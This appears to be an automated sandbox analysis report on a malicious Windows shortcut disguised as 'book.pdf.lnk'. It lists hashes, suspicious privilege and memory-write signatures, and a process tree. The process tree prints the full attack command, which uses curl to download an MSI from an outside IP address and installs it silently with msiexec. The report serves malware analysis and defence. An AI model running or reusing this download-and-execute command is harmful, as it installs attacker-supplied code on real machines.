Resubmissions
24-08-2023 17:35
230824-v568qafh4y 323-08-2023 19:18
230823-xz2gdsfa82 323-08-2023 19:16
230823-xy925sfa76 321-08-2023 09:54
230821-lw62xscb47 1021-08-2023 00:59
230821-bb4qysaa78 10Analysis
-
max time kernel
30s -
max time network
35s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
23-08-2023 19:16
Static task
static1
Behavioral task
behavioral1
Sample
book.pdf.lnk
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
book.pdf.lnk
Resource
win10v2004-20230703-en
General
-
Target
book.pdf.lnk
-
Size
1KB
-
MD5
0185e0fc2f505312001e1a65e6783908
-
SHA1
8e4cf0397ba32d233a515a5aca02751f6f9344c6
-
SHA256
8b3162141ac545fa0ae63777748973b8ee88bb8234a917d5fb3238d2c2ca963d
-
SHA512
1a484bb08401fd7476d37029fa753aa82af10aa702f30fa30568ff7eaf94b484e604bbff9f6b5a67179a7d708cf61bb767fa974e0a9f35e751d74d9a2dd4fefc
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of AdjustPrivilegeToken 32 IoCs
Processes:
msiexec.exemsiexec.exedescription pid process Token: SeShutdownPrivilege 4248 msiexec.exe Token: SeIncreaseQuotaPrivilege 4248 msiexec.exe Token: SeSecurityPrivilege 3056 msiexec.exe Token: SeCreateTokenPrivilege 4248 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4248 msiexec.exe Token: SeLockMemoryPrivilege 4248 msiexec.exe Token: SeIncreaseQuotaPrivilege 4248 msiexec.exe Token: SeMachineAccountPrivilege 4248 msiexec.exe Token: SeTcbPrivilege 4248 msiexec.exe Token: SeSecurityPrivilege 4248 msiexec.exe Token: SeTakeOwnershipPrivilege 4248 msiexec.exe Token: SeLoadDriverPrivilege 4248 msiexec.exe Token: SeSystemProfilePrivilege 4248 msiexec.exe Token: SeSystemtimePrivilege 4248 msiexec.exe Token: SeProfSingleProcessPrivilege 4248 msiexec.exe Token: SeIncBasePriorityPrivilege 4248 msiexec.exe Token: SeCreatePagefilePrivilege 4248 msiexec.exe Token: SeCreatePermanentPrivilege 4248 msiexec.exe Token: SeBackupPrivilege 4248 msiexec.exe Token: SeRestorePrivilege 4248 msiexec.exe Token: SeShutdownPrivilege 4248 msiexec.exe Token: SeDebugPrivilege 4248 msiexec.exe Token: SeAuditPrivilege 4248 msiexec.exe Token: SeSystemEnvironmentPrivilege 4248 msiexec.exe Token: SeChangeNotifyPrivilege 4248 msiexec.exe Token: SeRemoteShutdownPrivilege 4248 msiexec.exe Token: SeUndockPrivilege 4248 msiexec.exe Token: SeSyncAgentPrivilege 4248 msiexec.exe Token: SeEnableDelegationPrivilege 4248 msiexec.exe Token: SeManageVolumePrivilege 4248 msiexec.exe Token: SeImpersonatePrivilege 4248 msiexec.exe Token: SeCreateGlobalPrivilege 4248 msiexec.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.execmd.exedescription pid process target process PID 2288 wrote to memory of 3916 2288 cmd.exe cmd.exe PID 2288 wrote to memory of 3916 2288 cmd.exe cmd.exe PID 3916 wrote to memory of 3432 3916 cmd.exe curl.exe PID 3916 wrote to memory of 3432 3916 cmd.exe curl.exe PID 3916 wrote to memory of 4248 3916 cmd.exe msiexec.exe PID 3916 wrote to memory of 4248 3916 cmd.exe msiexec.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\book.pdf.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2288 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c echo %cd% > C:\Users\Admin\AppData\Local\Temp\ruta.txt & echo eGz & echo zv & echo GMp & echo RC & curl -o C:\Users\Admin\AppData\Local\Temp\ffbjzugu.msi http://107.181.161.200:443/msiffbjzugu & msiexec /i C:\Users\Admin\AppData\Local\Temp\ffbjzugu.msi /quiet /qn2⤵
- Suspicious use of WriteProcessMemory
PID:3916 -
C:\Windows\system32\curl.execurl -o C:\Users\Admin\AppData\Local\Temp\ffbjzugu.msi http://107.181.161.200:443/msiffbjzugu3⤵PID:3432
-
C:\Windows\system32\msiexec.exemsiexec /i C:\Users\Admin\AppData\Local\Temp\ffbjzugu.msi /quiet /qn3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4248
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3056
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3B
MD58a80554c91d9fca8acb82f023de02f11
SHA15f36b2ea290645ee34d943220a14b54ee5ea5be5
SHA256ca3d163bab055381827226140568f3bef7eaac187cebd76878e0b63e9e442356
SHA512ca4b6defb8adcc010050bc8b1bb8f8092c4928b8a0fba32146abcfb256e4d91672f88ca2cdf6210e754e5b8ac5e23fb023806ccd749ac8b701f79a691f03c87a